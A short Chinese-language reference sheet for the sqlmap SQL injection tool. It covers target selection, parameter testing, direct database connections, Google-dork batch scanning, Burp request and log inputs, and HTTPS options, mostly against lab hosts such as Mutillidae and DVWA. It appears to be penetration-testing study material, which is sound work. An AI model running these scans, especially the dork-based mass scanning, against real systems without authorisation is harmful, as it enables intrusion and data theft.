sqlmap Target

Sqlmap 针对关系型数据库的自动化注入工具，如mysql，mssql，oracle

NoSqlmap 针对NoSQL数据库(非关系型数据库)，如MongoDB，CouchDB，Redis

---

-p  设置要测试的参数。例如： -p "id,user"

root@kali:~# sqlmap -u "http://192.168.80.161/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p username -f

-d 连接数据库。sqlmap -d "mysql://user:password@192.168.20.10:3306/database"

root@kali:~# sqlmap -d "mysql://root:@192.168.80.161:3306/dvwa" --schema

-m 指定一个文本文件

root@kali:~# sqlmap -m list.txt --dbs

-g 通过谷歌搜索，可以用这个参数批量扫描注入点

root@kali:~# sqlmap -g "inurl:\".php?id=1\""  这里的 \ 是用来转义的

---

POST提交方式

1.使用http请求文件(结合burp截获的http数据包)

root@kali:~# sqlmap -r post.txt

2.使用burp的log文件

首先设置burp启用日志功能

通过-l参数，对log文件进行测试

root@kali:~# sqlmap -l log.txt

---

HTTPS扫描

sqlmap -u “https://1.1.1.1/a.php?id=1:8843” --force-ssl

-c 加载sqlmap.conf文件的相关配置

root@kali:~# cat /etc/sqlmap/sqlmap.conf  默认配置文件位置

sqlmap的扫描结果保存在.sqlmap/output/中